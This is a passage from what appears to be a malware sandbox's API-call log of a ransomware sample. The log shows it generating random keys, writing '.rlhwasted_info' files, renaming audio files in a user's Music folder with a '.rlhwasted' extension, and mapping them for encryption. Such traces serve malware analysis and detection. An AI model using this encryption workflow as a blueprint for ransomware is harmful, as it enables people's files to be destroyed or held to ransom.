hHeap=0x6b0000) returned 1 [0195.025] CloseHandle (hObject=0x124) returned 1 [0195.027] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0195.027] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0195.028] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.028] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.028] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\i_89uOlSa5.wav") returned 84 [0195.028] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b2) returned 0x6e8978 [0195.028] lstrcpyW (in: lpString1=0x6e8a20, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.028] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.028] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0195.029] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.029] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\i_89uOlSa5.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\i_89uolsa5.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.030] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.031] SetEndOfFile (hFile=0x124) returned 1 [0195.031] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.032] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.032] lstrcpyW (in: lpString1=0x6e8a20, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\i_89uOlSa5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\i_89uolsa5.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\i_89uOlSa5.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\i_89uolsa5.wav.rlhwasted")) returned 1 [0195.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\i_89uOlSa5.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\i_89uolsa5.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.033] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.034] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0195.035] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e8c80 | out: pbBuffer=0x6e8c80) returned 1 [0195.035] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.035] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0195.036] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.036] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.047] SetEndOfFile (hFile=0x124) returned 1 [0195.050] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.050] CloseHandle (hObject=0x124) returned 1 [0195.052] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0195.052] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0195.053] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.053] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\UFDtKAMcLFNOK.m4a") returned 87 [0195.053] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b8) returned 0x70a1d0 [0195.053] lstrcpyW (in: lpString1=0x70a27e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.053] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.053] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0195.054] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.054] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\UFDtKAMcLFNOK.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\ufdtkamclfnok.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.055] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.079] SetEndOfFile (hFile=0x124) returned 1 [0195.119] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.119] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.119] lstrcpyW (in: lpString1=0x70a27e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\UFDtKAMcLFNOK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\ufdtkamclfnok.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\UFDtKAMcLFNOK.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\ufdtkamclfnok.m4a.rlhwasted")) returned 1 [0195.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\FOc-OgJT3C\\UFDtKAMcLFNOK.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\foc-ogjt3c\\ufdtkamclfnok.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0195.120] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0195.122] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0195.123] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x70a010 | out: pbBuffer=0x70a010) returned 1 [0195.123] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.123] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0195.124] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.124] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.135] SetEndOfFile (hFile=0x124) returned 1 [0195.138] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.138] CloseHandle (hObject=0x124) returned 1 [0195.140] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70a1d0 | out: hHeap=0x6b0000) returned 1 [0195.140] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0195.141] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.141] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.141] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\G8ndSE9BMkXakqjuMvd.m4a") returned 82 [0195.141] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ae) returned 0x70cfe8 [0195.142] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.142] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.142] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0195.142] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.143] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\G8ndSE9BMkXakqjuMvd.m4a.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\g8ndse9bmkxakqjumvd.m4a.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.143] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.145] SetEndOfFile (hFile=0x124) returned 1 [0195.145] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.145] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.145] lstrcpyW (in: lpString1=0x70d08c, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\G8ndSE9BMkXakqjuMvd.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\g8ndse9bmkxakqjumvd.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\G8ndSE9BMkXakqjuMvd.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\g8ndse9bmkxakqjumvd.m4a.rlhwasted")) returned 1 [0195.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\G8ndSE9BMkXakqjuMvd.m4a.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\g8ndse9bmkxakqjumvd.m4a.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.146] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.147] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0195.148] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x6ee7f0 | out: pbBuffer=0x6ee7f0) returned 1 [0195.148] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.148] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0195.149] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.149] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.212] SetEndOfFile (hFile=0x124) returned 1 [0195.215] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.215] CloseHandle (hObject=0x124) returned 1 [0195.217] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0195.217] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0195.218] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.218] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.218] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\7G7Y6vKU52T5.wav") returned 91 [0195.218] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c0) returned 0x70cfe8 [0195.219] lstrcpyW (in: lpString1=0x70d09e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.219] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.219] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0195.220] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.220] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0195.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\7G7Y6vKU52T5.wav.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\7g7y6vku52t5.wav.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.220] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.222] SetEndOfFile (hFile=0x124) returned 1 [0195.222] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.222] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.222] lstrcpyW (in: lpString1=0x70d09e, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\7G7Y6vKU52T5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\7g7y6vku52t5.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\7G7Y6vKU52T5.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\7g7y6vku52t5.wav.rlhwasted")) returned 1 [0195.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\7G7Y6vKU52T5.wav.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\7g7y6vku52t5.wav.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0195.223] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0195.226] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x710fe8) returned 1 [0195.227] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0195.227] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.227] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x710fe8) returned 1 [0195.236] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.236] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.296] SetEndOfFile (hFile=0x124) returned 1 [0195.298] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.298] CloseHandle (hObject=0x124) returned 1 [0195.301] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0195.301] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0195.302] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.302] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.302] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\AuVYLp9e-fiJFxyzZ.mp3") returned 96 [0195.302] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ca) returned 0x6d5420 [0195.302] lstrcpyW (in: lpString1=0x6d54e0, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.302] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.302] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0195.366] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.367] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\AuVYLp9e-fiJFxyzZ.mp3.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\auvylp9e-fijfxyzz.mp3.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0195.367] WriteFile (in: hFile=0x124, lpBuffer=0x6ef280*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6ef280*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0195.368] SetEndOfFile (hFile=0x124) returned 1 [0195.368] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.368] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.368] lstrcpyW (in: lpString1=0x6d54e0, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0195.368] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\AuVYLp9e-fiJFxyzZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\auvylp9e-fijfxyzz.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\AuVYLp9e-fiJFxyzZ.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\auvylp9e-fijfxyzz.mp3.rlhwasted")) returned 1 [0195.369] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\AuVYLp9e-fiJFxyzZ.mp3.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vxfh7qrk19daiuy5gt\\ltna4owdb9l5q9o\\auvylp9e-fijfxyzz.mp3.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0195.369] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x104 [0195.370] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0195.371] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x704798 | out: pbBuffer=0x704798) returned 1 [0195.371] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.371] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0195.372] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0195.372] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0195.381] SetEndOfFile (hFile=0x124) returned 1 [0195.383] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef280 | out: hHeap=0x6b0000) returned 1 [0195.383] CloseHandle (hObject=0x124) returned 1 [0195.385] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0195.385] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0195.386] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0195.386] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0195.386] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\vxfh7QRk19daIUY5Gt\\LtNA4OWDB9l5q9O\\ju5M6YfKzwMcTi.wav") returned 93 [0195.386] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c4) returned 0x6d5420 [0195.386] lstrcpyW (in: lpString1=0x6d54da, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0195.386] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6ef280 [0195.386] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0195.387] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6ef280 | out: pbBuffer=0x6ef280) returned 1 [0195.387] CryptReleaseContext 